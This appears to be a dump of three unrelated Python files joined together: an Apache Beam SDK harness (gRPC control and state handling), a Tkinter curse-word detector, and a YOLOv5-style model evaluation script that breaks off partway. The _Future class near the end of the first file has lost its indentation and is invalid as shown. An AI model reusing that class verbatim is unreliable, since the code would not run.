  SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes

  def __init__(
      self, control_address, worker_count, credentials=None, worker_id=None,
      profiler_factory=None):
    self._alive = True
    self._worker_count = worker_count
    self._worker_index = 0
    self._worker_id = worker_id
    if credentials is None:
      logging.info('Creating insecure control channel for %s.', control_address)
      self._control_channel = grpc.insecure_channel(control_address)
    else:
      logging.info('Creating secure control channel for %s.', control_address)
      self._control_channel = grpc.secure_channel(control_address, credentials)
    # Block until the runner side of the control channel is reachable.
    grpc.channel_ready_future(self._control_channel).result(timeout=60)
    logging.info('Control channel established.')
    # Attach the worker id to every outgoing request.
    self._control_channel = grpc.intercept_channel(
        self._control_channel, WorkerIdInterceptor(self._worker_id))
    self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
        credentials)
    self._state_handler_factory = GrpcStateHandlerFactory()
    self._profiler_factory = profiler_factory
    # Pool of idle SdkWorkers; also acts as the scheduling semaphore.
    self.workers = queue.Queue()
    # One thread is enough for getting the progress report.
    # Assumption:
    # Progress report generation should not do IO or wait on other resources.
    # Without wait, having multiple threads will not improve performance and
    # will only add complexity.
    self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
    self._process_thread_pool = futures.ThreadPoolExecutor(
        max_workers=self._worker_count)
    # Maps instruction ids of in-flight bundles to the executing worker.
    self._instruction_id_vs_worker = {}
    # Registered ProcessBundleDescriptors, shared by all workers.
    self._fns = {}
    self._responses = queue.Queue()
    self._process_bundle_queue = queue.Queue()
    # Maps instruction id -> receive time for bundles not yet scheduled.
    self._unscheduled_process_bundle = {}
    logging.info('Initializing SDKHarness with %s workers.', self._worker_count)

  def run(self):
    """Reads the control stream and dispatches requests until it closes."""
    control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
    no_more_work = object()

    # Create workers
    for _ in range(self._worker_count):
      # SdkHarness manages function registration and shares self._fns with
      # all the workers. This is needed because function registration
      # (register) and execution (process_bundle) are sent over different
      # requests and we do not really know which worker is going to process
      # the bundle for a function until we get a process_bundle request.
      # Moreover the same function is reused by different process bundle
      # calls and potentially gets executed by different workers, hence we
      # need a centralized function list shared among all the workers.
      self.workers.put(
          SdkWorker(
              state_handler_factory=self._state_handler_factory,
              data_channel_factory=self._data_channel_factory,
              fns=self._fns,
              profiler_factory=self._profiler_factory))

    def get_responses():
      # Generator feeding instruction responses back to the runner; ends
      # when the no_more_work sentinel is queued.
      while True:
        response = self._responses.get()
        if response is no_more_work:
          return
        yield response

    self._alive = True
    monitoring_thread = threading.Thread(target=self._monitor_process_bundle)
    monitoring_thread.daemon = True
    monitoring_thread.start()

    try:
      for work_request in control_stub.Control(get_responses()):
        logging.debug('Got work %s', work_request.instruction_id)
        request_type = work_request.WhichOneof('request')
        # Name spacing the request method with 'request_'. The called method
        # will be like self.request_register(request)
        getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
            work_request)
    finally:
      self._alive = False

    logging.info('No more requests from control plane')
    logging.info('SDK Harness waiting for in-flight requests to complete')
    # Wait until existing requests are processed.
    self._progress_thread_pool.shutdown()
    self._process_thread_pool.shutdown()
    # get_responses may be blocked on responses.get(), but we need to return
    # control to its caller.
    self._responses.put(no_more_work)
    # Stop all the workers and clean all the associated resources
    self._data_channel_factory.close()
    self._state_handler_factory.close()
    logging.info('Done consuming work.')

  def _execute(self, task, request):
    """Runs task(), converting any exception into an error response."""
    try:
      response = task()
    except Exception:  # pylint: disable=broad-except
      traceback_string = traceback.format_exc()
      print(traceback_string, file=sys.stderr)
      logging.error(
          'Error processing instruction %s. Original traceback is\n%s\n',
          request.instruction_id, traceback_string)
      response = beam_fn_api_pb2.InstructionResponse(
          instruction_id=request.instruction_id, error=traceback_string)
    self._responses.put(response)

  def _request_register(self, request):
    """Stores the request's bundle descriptors in the shared registry."""

    def task():
      for process_bundle_descriptor in getattr(
          request, request.WhichOneof('request')).process_bundle_descriptor:
        self._fns[process_bundle_descriptor.id] = process_bundle_descriptor

      return beam_fn_api_pb2.InstructionResponse(
          instruction_id=request.instruction_id,
          register=beam_fn_api_pb2.RegisterResponse())

    self._execute(task, request)

  def _request_process_bundle(self, request):
    """Queues the bundle request and schedules it on the thread pool."""

    def task():
      # Take the free worker. Wait till a worker is free.
      worker = self.workers.get()
      # Get the first work item in the queue
      work = self._process_bundle_queue.get()
      # Add the instruction_id vs worker map for progress reporting lookup.
      self._instruction_id_vs_worker[work.instruction_id] = worker
      self._unscheduled_process_bundle.pop(work.instruction_id, None)
      try:
        self._execute(lambda: worker.do_instruction(work), work)
      finally:
        # Delete the instruction_id <-> worker mapping
        self._instruction_id_vs_worker.pop(work.instruction_id, None)
        # Put the worker back in the free worker pool
        self.workers.put(worker)

    # Create a task for each process_bundle request and schedule it
    self._process_bundle_queue.put(request)
    self._unscheduled_process_bundle[request.instruction_id] = time.time()
    self._process_thread_pool.submit(task)
    logging.debug(
        "Currently using %s threads." % len(self._process_thread_pool._threads))

  def _request_process_bundle_progress(self, request):
    """Routes the progress request to the worker executing that bundle."""

    def task():
      instruction_reference = getattr(
          request, request.WhichOneof('request')).instruction_reference
      if instruction_reference in self._instruction_id_vs_worker:
        # The bundle is currently executing; ask its worker for progress.
        self._execute(
            lambda: self._instruction_id_vs_worker[
                instruction_reference
            ].do_instruction(request), request)
      else:
        # Either still queued or completely unknown.
        self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
            instruction_id=request.instruction_id, error=(
                'Process bundle request not yet scheduled for instruction {}' if
                instruction_reference in self._unscheduled_process_bundle else
                'Unknown process bundle instruction {}').format(
                    instruction_reference)), request)

    self._progress_thread_pool.submit(task)

  def _monitor_process_bundle(self):
    """
    Monitor the unscheduled bundles and log if a bundle is not scheduled for
    more than SCHEDULING_DELAY_THRESHOLD_SEC.
    """
    while self._alive:
      time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
      # Check for bundles to be scheduled.
      # NOTE(review): the dict is mutated by the scheduling threads while
      # being iterated here — confirm this cannot raise
      # "dictionary changed size during iteration" under load.
      if self._unscheduled_process_bundle:
        current_time = time.time()
        for instruction_id in self._unscheduled_process_bundle:
          request_time = None
          try:
            request_time = self._unscheduled_process_bundle[instruction_id]
          except KeyError:
            # Entry scheduled (removed) between iteration and lookup.
            pass
          if request_time:
            scheduling_delay = current_time - request_time
            if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
              logging.warn('Unable to schedule instruction %s for %s',
                           instruction_id, scheduling_delay)
class SdkWorker(object):
  """Executes single instructions (register / process_bundle / progress)
  for the harness, caching bundle processors per descriptor for reuse."""

  def __init__(self, state_handler_factory, data_channel_factory, fns,
               profiler_factory=None):
    # Shared registry of ProcessBundleDescriptors (owned by SdkHarness).
    self.fns = fns
    self.state_handler_factory = state_handler_factory
    self.data_channel_factory = data_channel_factory
    # instruction_id -> processor for bundles currently being executed.
    self.active_bundle_processors = {}
    # descriptor_id -> list of processors available for reuse.
    self.cached_bundle_processors = collections.defaultdict(list)
    self.profiler_factory = profiler_factory

  def do_instruction(self, request):
    """Dispatches a work request to the method named after its set oneof."""
    request_type = request.WhichOneof('request')
    if request_type:
      # E.g. if register is set, this will call self.register(request.register))
      return getattr(self, request_type)(getattr(request, request_type),
                                         request.instruction_id)
    else:
      raise NotImplementedError

  def register(self, request, instruction_id):
    """Stores the request's bundle descriptors for later processing."""
    for process_bundle_descriptor in request.process_bundle_descriptor:
      self.fns[process_bundle_descriptor.id] = process_bundle_descriptor
    return beam_fn_api_pb2.InstructionResponse(
        instruction_id=instruction_id,
        register=beam_fn_api_pb2.RegisterResponse())

  def process_bundle(self, request, instruction_id):
    """Executes the referenced bundle, optionally under a profiler."""
    with self.get_bundle_processor(
        instruction_id,
        request.process_bundle_descriptor_reference) as bundle_processor:
      with self.maybe_profile(instruction_id):
        bundle_processor.process_bundle(instruction_id)

      return beam_fn_api_pb2.InstructionResponse(
          instruction_id=instruction_id,
          process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
              metrics=bundle_processor.metrics(),
              monitoring_infos=bundle_processor.monitoring_infos()))

  @contextlib.contextmanager
  def get_bundle_processor(self, instruction_id, bundle_descriptor_id):
    """Yields a processor for the descriptor, reusing a cached one when
    available and returning it to the cache only on success."""
    try:
      # pop() is threadsafe
      processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
      state_handler = processor.state_handler
    except IndexError:
      # No cached processor: build one from the registered descriptor.
      process_bundle_desc = self.fns[bundle_descriptor_id]
      state_handler = self.state_handler_factory.create_state_handler(
          process_bundle_desc.state_api_service_descriptor)
      processor = bundle_processor.BundleProcessor(
          process_bundle_desc,
          state_handler,
          self.data_channel_factory)
    try:
      self.active_bundle_processors[instruction_id] = processor
      with state_handler.process_instruction_id(instruction_id):
        yield processor
    finally:
      del self.active_bundle_processors[instruction_id]
    # Outside the finally block as we only want to re-use on success.
    processor.reset()
    self.cached_bundle_processors[bundle_descriptor_id].append(processor)

  def process_bundle_progress(self, request, instruction_id):
    """Reports progress for an in-flight bundle (empty if not in flight)."""
    # It is an error to get progress for a not-in-flight bundle.
    processor = self.active_bundle_processors.get(request.instruction_reference)
    return beam_fn_api_pb2.InstructionResponse(
        instruction_id=instruction_id,
        process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
            metrics=processor.metrics() if processor else None,
            monitoring_infos=processor.monitoring_infos() if processor else []))

  @contextlib.contextmanager
  def maybe_profile(self, instruction_id):
    """Wraps execution in a profiler when a factory produces one."""
    if self.profiler_factory:
      profiler = self.profiler_factory(instruction_id)
      if profiler:
        with profiler:
          yield
      else:
        yield
    else:
      yield
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
  """An abstract factory for creating ``StateHandler`` instances."""

  @abc.abstractmethod
  def create_state_handler(self, api_service_descriptor):
    """Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
    raise NotImplementedError(type(self))

  @abc.abstractmethod
  def close(self):
    """Close all channels that this factory owns."""
    raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
  """A factory for ``GrpcStateHandler``.

  Caches the created channels by ``state descriptor url``.
  """

  def __init__(self):
    self._state_handler_cache = {}
    self._lock = threading.Lock()
    # Handed out when a descriptor has no state service configured.
    self._throwing_state_handler = ThrowingStateHandler()

  def create_state_handler(self, api_service_descriptor):
    """Returns a (cached) handler for the descriptor's state service url."""
    if not api_service_descriptor:
      return self._throwing_state_handler
    url = api_service_descriptor.url
    # Check-lock-check so the common cached path avoids taking the lock.
    if url not in self._state_handler_cache:
      with self._lock:
        if url not in self._state_handler_cache:
          logging.info('Creating insecure state channel for %s', url)
          grpc_channel = grpc.insecure_channel(
              url,
              # Options to have no limits (-1) on the size of the messages
              # received or sent over the data plane. The actual buffer size is
              # controlled in a layer above.
              options=[("grpc.max_receive_message_length", -1),
                       ("grpc.max_send_message_length", -1)])
          logging.info('State channel established.')
          # Add workerId to the grpc channel
          grpc_channel = grpc.intercept_channel(grpc_channel,
                                                WorkerIdInterceptor())
          self._state_handler_cache[url] = GrpcStateHandler(
              beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
    return self._state_handler_cache[url]

  def close(self):
    """Shuts down every cached state handler and empties the cache."""
    logging.info('Closing all cached gRPC state handlers.')
    for _, state_handler in self._state_handler_cache.items():
      state_handler.done()
    self._state_handler_cache.clear()
class ThrowingStateHandler(object):
  """A state handler that errors on any requests.

  Handed out when a ProcessBundleDescriptor carries no state
  ApiServiceDescriptor, i.e. state access is not available for the bundle.
  """

  # Single shared template; the original triplicated it and also passed the
  # format arguments in the wrong order (state_key where the instruction id
  # belonged, and vice versa).
  _ERROR_TEMPLATE = (
      'Unable to handle state requests for a ProcessBundleDescriptor without '
      'a state ApiServiceDescriptor for instruction %s and state key %s.')

  def blocking_get(self, state_key, instruction_reference):
    raise RuntimeError(
        self._ERROR_TEMPLATE % (instruction_reference, state_key))

  def blocking_append(self, state_key, data, instruction_reference):
    raise RuntimeError(
        self._ERROR_TEMPLATE % (instruction_reference, state_key))

  def blocking_clear(self, state_key, instruction_reference):
    raise RuntimeError(
        self._ERROR_TEMPLATE % (instruction_reference, state_key))
class GrpcStateHandler(object):
  """Bridges blocking state requests onto the bidirectional gRPC State
  stream, matching responses to requests by id."""

  _DONE = object()

  def __init__(self, state_stub):
    self._lock = threading.Lock()
    self._state_stub = state_stub
    # Outgoing requests, drained by the request iterator on the stream.
    self._requests = queue.Queue()
    # request id -> _Future awaited by the requesting thread.
    self._responses_by_id = {}
    self._last_id = 0
    # Set by the reader thread if the response stream fails.
    self._exc_info = None
    # Per-thread binding of the current instruction id.
    self._context = threading.local()
    self.start()

  @contextlib.contextmanager
  def process_instruction_id(self, bundle_id):
    """Binds subsequent state requests on this thread to ``bundle_id``."""
    if getattr(self._context, 'process_instruction_id', None) is not None:
      raise RuntimeError(
          'Already bound to %r' % self._context.process_instruction_id)
    self._context.process_instruction_id = bundle_id
    try:
      yield
    finally:
      self._context.process_instruction_id = None

  def start(self):
    """Opens the State stream and starts the response-reader thread."""
    self._done = False

    def request_iter():
      while True:
        request = self._requests.get()
        if request is self._DONE or self._done:
          break
        yield request

    responses = self._state_stub.State(request_iter())

    def pull_responses():
      try:
        for response in responses:
          # Wake up the thread blocked in _blocking_request for this id.
          self._responses_by_id[response.id].set(response)
          if self._done:
            break
      except:  # pylint: disable=bare-except
        # Stash the failure so waiting threads can re-raise it.
        self._exc_info = sys.exc_info()
        raise

    reader = threading.Thread(target=pull_responses, name='read_state')
    reader.daemon = True
    reader.start()

  def done(self):
    """Shuts down the stream; pending request_iter consumers unblock."""
    self._done = True
    self._requests.put(self._DONE)

  def blocking_get(self, state_key, continuation_token=None):
    """Fetches state data, returning (data, continuation_token)."""
    response = self._blocking_request(
        beam_fn_api_pb2.StateRequest(
            state_key=state_key,
            get=beam_fn_api_pb2.StateGetRequest(
                continuation_token=continuation_token)))
    return response.get.data, response.get.continuation_token

  def blocking_append(self, state_key, data):
    """Appends data to the state stored under state_key."""
    self._blocking_request(
        beam_fn_api_pb2.StateRequest(
            state_key=state_key,
            append=beam_fn_api_pb2.StateAppendRequest(data=data)))

  def blocking_clear(self, state_key):
    """Clears the state stored under state_key."""
    self._blocking_request(
        beam_fn_api_pb2.StateRequest(
            state_key=state_key,
            clear=beam_fn_api_pb2.StateClearRequest()))

  def _blocking_request(self, request):
    """Sends the request and blocks until its response arrives.

    Polls every second so reader-thread failures and shutdown are noticed;
    raises RuntimeError for error responses or shutdown, re-raises reader
    exceptions with their original traceback.
    """
    request.id = self._next_id()
    request.instruction_reference = self._context.process_instruction_id
    self._responses_by_id[request.id] = future = _Future()
    self._requests.put(request)
    while not future.wait(timeout=1):
      if self._exc_info:
        t, v, tb = self._exc_info
        raise_(t, v, tb)
      elif self._done:
        raise RuntimeError()
    del self._responses_by_id[request.id]
    response = future.get()
    if response.error:
      raise RuntimeError(response.error)
    else:
      return response

  def _next_id(self):
    # NOTE(review): increment is not guarded by self._lock — presumably
    # safe under the GIL for int +=, but confirm callers cannot race here.
    self._last_id += 1
    return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
|
censor.py | import tkinter as tk
from tkinter import *
from PIL import Image
from PIL import ImageTk
from datetime import date
import shortuuid
import multiprocessing
import time
### This Function is used to detect censor words ###
def censor(listOfWords):
    """Poll the shared temp file and log any curse words found in it.

    Args:
        listOfWords: the curse-word dataset as one comma-separated string.

    Runs forever; intended to execute in its own process alongside the GUI,
    which rewrites Utils/tempFile.txt every 2 seconds. Detected words are
    printed and appended (once each) to a uniquely named log file.
    """
    listOfWords = listOfWords.split(",")  # dataset of curse words
    li = []  # words already reported, so there won't be any repetitions
    # Unique log file name per run.
    filename = "Utils/CurseWordsDetected/detectedWords" + str(shortuuid.uuid()) + ".txt"
    while True:
        # 'with' closes the handle the original code leaked on every poll.
        with open("Utils/tempFile.txt", "r") as f:
            userInput = f.read()
        # Strip separators that would otherwise glue words together.
        userInput = userInput.replace(".", " ")
        userInput = userInput.replace(",", " ")
        userInput = userInput.replace("/", " ")
        userInputList = userInput.split()
        # Traverse the dataset and check whether any entry matches.
        for ele in listOfWords:
            if str(ele).strip() in str(userInput):
                # Substring matches can be false alerts (e.g. "ho" inside
                # "homework"); single words must match a whole token.
                if len(str(ele).strip().split(" ")) < 2 and str(ele).strip() not in userInputList:
                    continue
                # Print on terminal detected word
                print(ele, "detected")
                # Save in text file, once per word; 'with' closes the
                # handle the original leaked on every detection.
                if ele not in li:
                    li.append(ele)
                    with open(filename, "a+") as out:
                        out.write(ele + "\n")
                # NOTE(review): sleep kept on the detection branch as in the
                # original ordering — throttles repeated detections.
                time.sleep(1)
            else:
                continue
## This function creates GUI for detector
def guiForCensor():
    """Build and run the Tkinter window where the user types text.

    Side effects: every 2 seconds the current text widget contents are
    mirrored into Utils/tempFile.txt for the censor process to scan; the
    Save button writes a dated copy under Utils/InputFile/.
    """
    # This function is for saving written input by the user to the file
    # after clicking save button.
    def saveToFile():
        nameOfFile = 'Utils/InputFile/'+str(date.today())+str(shortuuid.uuid())+'.txt'
        inputTextMatter=inputtxt.get(1.0,"end-1c")
        f = open(nameOfFile, "w+")
        f.write(str(inputTextMatter))
        print(">> saveFunction")
    # This is for backend purpose, we are saving file in temp so we can get
    # it later; re-schedules itself every 2 seconds via frame.after.
    def printInput():
        inputTextMatter=inputtxt.get(1.0,"end-1c")
        f = open("Utils/tempFile.txt", "w+")
        f.write(str(inputTextMatter))
        frame.after(2000, printInput)
    # Creating Frame
    frame = tk.Tk()
    frame.title("Censor Words")
    frame.geometry('640x480')
    # Setting Background and necessary components
    bg="Images/bg.jpg"
    image=Image.open(bg)
    image = image.resize((640,480), Image.ANTIALIAS)
    bg = ImageTk.PhotoImage(image)
    bglabel=Label(frame,image=bg)
    bglabel.place(x=0,y=0)
    inputtxt = tk.Text(frame, height = 15,width = 50)
    inputtxt.place(x=120,y=100)
    heading = tk.Label(frame, text="Censor Words", font=("Gentium Basic", 25), bg='#255543', fg='#fff')
    heading.place(x=220,y=50)
    saveButton = tk.Button(frame,text="Save",command=saveToFile)
    saveButton.place(x=315,y=400)
    # Kick off the periodic mirror-to-temp-file loop, then enter mainloop.
    frame.after(2000, printInput)
    frame.mainloop()
# Opening dataset of curse words; 'with' ensures the handle is closed
# (the original leaked it at import time).
with open("Utils/censor_word_list.txt", "r") as f:
    listOfWords = f.read()

# Use of multiprocessing to run detector and GUI at the same time.
p1 = multiprocessing.Process(target=censor, args=(listOfWords,))
p2 = multiprocessing.Process(target=guiForCensor)

if __name__ == "__main__":
    p1.start()
    p2.start()
|
test.py | import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
         weights=None,
         batch_size=32,
         imgsz=640,
         conf_thres=0.001,
         iou_thres=0.6,  # for NMS
         save_json=False,
         single_cls=False,
         augment=False,
         verbose=False,
         model=None,
         dataloader=None,
         save_dir=Path(''),  # for saving images
         save_txt=False,  # for auto-labelling
         save_hybrid=False,  # for hybrid auto-labelling
         save_conf=False,  # save auto-label confidences
         plots=True,
         log_imgs=0,  # number of logged images
         compute_loss=None):
    """Evaluate a YOLO detection model on a val/test dataset.

    Computes per-class precision, recall, mAP@0.5 and mAP@0.5:0.95, and can
    optionally write YOLO-format label txt files, W&B image logs, and a
    COCO-format predictions JSON evaluated with pycocotools.

    Parameters
    ----------
    data : str
        Path to a dataset *.yaml describing val/test image paths and 'nc'.
    weights : str or list, optional
        Checkpoint path(s); used only when no `model` is supplied.
    batch_size, imgsz : int
        Inference batch size and square image size.
    conf_thres, iou_thres : float
        Confidence threshold and NMS IoU threshold.
    model, dataloader : optional
        Supplied by train.py when validating mid-training; otherwise the
        model is loaded from `weights` and a dataloader is created here.
    compute_loss : callable, optional
        Training loss function; when given, val loss components (box, obj,
        cls) are accumulated and returned.

    Returns
    -------
    tuple
        ((mp, mr, map50, map, *val_losses), per-class mAP array, timing tuple).

    NOTE(review): when called directly (not from train.py) this reads the
    module-level `opt` parsed in __main__, so it is not usable standalone.
    """
    # Initialize/load model and set device
    training = model is not None
    if training:  # called by train.py
        device = next(model.parameters()).device  # get model device
    else:  # called directly
        set_logging()
        device = select_device(opt.device, batch_size=batch_size)

        # Directories
        save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok))  # increment run
        (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True)  # make dir

        # Load model
        model = attempt_load(weights, map_location=device)  # load FP32 model
        gs = max(int(model.stride.max()), 32)  # grid size (max stride)
        imgsz = check_img_size(imgsz, s=gs)  # check img_size

        # Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
        # if device.type != 'cpu' and torch.cuda.device_count() > 1:
        #     model = nn.DataParallel(model)

    # Half
    half = device.type != 'cpu'  # half precision only supported on CUDA
    if half:
        model.half()

    # Configure
    model.eval()
    is_coco = data.endswith('coco.yaml')  # is COCO dataset
    with open(data) as f:
        data = yaml.load(f, Loader=yaml.SafeLoader)  # model dict
    check_dataset(data)  # check
    nc = 1 if single_cls else int(data['nc'])  # number of classes
    iouv = torch.linspace(0.5, 0.95, 10).to(device)  # iou vector for mAP@0.5:0.95
    niou = iouv.numel()

    # Logging
    log_imgs, wandb = min(log_imgs, 100), None  # ceil
    try:
        import wandb  # Weights & Biases
    except ImportError:
        log_imgs = 0

    # Dataloader
    if not training:
        if device.type != 'cpu':
            model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters())))  # run once
        path = data['test'] if opt.task == 'test' else data['val']  # path to val/test images
        dataloader = create_dataloader(path, imgsz, batch_size, gs, opt, pad=0.5, rect=True,
                                       prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]

    seen = 0
    confusion_matrix = ConfusionMatrix(nc=nc)
    names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
    coco91class = coco80_to_coco91_class()
    s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
    # NOTE(review): `map` here (and `eval` further down) shadow Python builtins;
    # kept as-is because callers unpack these names from the return value.
    p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
    loss = torch.zeros(3, device=device)
    jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
    for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
        img = img.to(device, non_blocking=True)
        img = img.half() if half else img.float()  # uint8 to fp16/32
        img /= 255.0  # 0 - 255 to 0.0 - 1.0
        targets = targets.to(device)
        nb, _, height, width = img.shape  # batch size, channels, height, width

        with torch.no_grad():
            # Run model
            t = time_synchronized()
            out, train_out = model(img, augment=augment)  # inference and training outputs
            t0 += time_synchronized() - t

            # Compute loss
            if compute_loss:
                loss += compute_loss([x.float() for x in train_out], targets)[1][:3]  # box, obj, cls

            # Run NMS
            targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device)  # to pixels
            lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else []  # for autolabelling
            t = time_synchronized()
            out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
            t1 += time_synchronized() - t

        # Statistics per image
        for si, pred in enumerate(out):
            labels = targets[targets[:, 0] == si, 1:]
            nl = len(labels)
            tcls = labels[:, 0].tolist() if nl else []  # target class
            path = Path(paths[si])
            seen += 1

            if len(pred) == 0:
                if nl:
                    stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
                continue

            # Predictions
            predn = pred.clone()
            scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1])  # native-space pred

            # Append to text file
            if save_txt:
                gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]]  # normalization gain whwh
                for *xyxy, conf, cls in predn.tolist():
                    xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist()  # normalized xywh
                    line = (cls, *xywh, conf) if save_conf else (cls, *xywh)  # label format
                    with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
                        f.write(('%g ' * len(line)).rstrip() % line + '\n')

            # W&B logging
            if plots and len(wandb_images) < log_imgs:
                box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
                             "class_id": int(cls),
                             "box_caption": "%s %.3f" % (names[cls], conf),
                             "scores": {"class_score": conf},
                             "domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
                boxes = {"predictions": {"box_data": box_data, "class_labels": names}}  # inference-space
                wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))

            # Append to pycocotools JSON dictionary
            if save_json:
                # [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
                image_id = int(path.stem) if path.stem.isnumeric() else path.stem
                box = xyxy2xywh(predn[:, :4])  # xywh
                box[:, :2] -= box[:, 2:] / 2  # xy center to top-left corner
                # NOTE(review): `p` here shadows the precision scalar initialised
                # above; harmless only because ap_per_class() recomputes `p` later.
                for p, b in zip(pred.tolist(), box.tolist()):
                    jdict.append({'image_id': image_id,
                                  'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
                                  'bbox': [round(x, 3) for x in b],
                                  'score': round(p[4], 5)})

            # Assign all predictions as incorrect
            correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
            if nl:
                detected = []  # target indices
                tcls_tensor = labels[:, 0]

                # target boxes
                tbox = xywh2xyxy(labels[:, 1:5])
                scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1])  # native-space labels
                if plots:
                    confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))

                # Per target class
                for cls in torch.unique(tcls_tensor):
                    ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1)  # prediction indices
                    pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1)  # target indices

                    # Search for detections
                    if pi.shape[0]:
                        # Prediction to target ious
                        ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1)  # best ious, indices

                        # Append detections
                        detected_set = set()
                        for j in (ious > iouv[0]).nonzero(as_tuple=False):
                            d = ti[i[j]]  # detected target
                            if d.item() not in detected_set:
                                detected_set.add(d.item())
                                detected.append(d)
                                correct[pi[j]] = ious[j] > iouv  # iou_thres is 1xn
                                if len(detected) == nl:  # all targets already located in image
                                    break

            # Append statistics (correct, conf, pcls, tcls)
            stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))

        # Plot images
        if plots and batch_i < 3:
            f = save_dir / f'test_batch{batch_i}_labels.jpg'  # labels
            Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
            f = save_dir / f'test_batch{batch_i}_pred.jpg'  # predictions
            Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()

    # Compute statistics
    stats = [np.concatenate(x, 0) for x in zip(*stats)]  # to numpy
    if len(stats) and stats[0].any():
        p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
        ap50, ap = ap[:, 0], ap.mean(1)  # AP@0.5, AP@0.5:0.95
        mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
        nt = np.bincount(stats[3].astype(np.int64), minlength=nc)  # number of targets per class
    else:
        nt = torch.zeros(1)

    # Print results
    pf = '%20s' + '%12.3g' * 6  # print format
    print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))

    # Print results per class
    if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
        for i, c in enumerate(ap_class):
            print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))

    # Print speeds
    t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size)  # tuple
    if not training:
        print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)

    # Plots
    if plots:
        confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
        if wandb and wandb.run:
            val_batches = [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
            wandb.log({"Images": wandb_images, "Validation": val_batches}, commit=False)

    # Save JSON
    if save_json and len(jdict):
        w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else ''  # weights
        anno_json = '../coco/annotations/instances_val2017.json'  # annotations json
        pred_json = str(save_dir / f"{w}_predictions.json")  # predictions json
        print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
        with open(pred_json, 'w') as f:
            json.dump(jdict, f)

        try:  # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
            from pycocotools.coco import COCO
            from pycocotools.cocoeval import COCOeval

            anno = COCO(anno_json)  # init annotations api
            pred = anno.loadRes(pred_json)  # init predictions api
            eval = COCOeval(anno, pred, 'bbox')
            if is_coco:
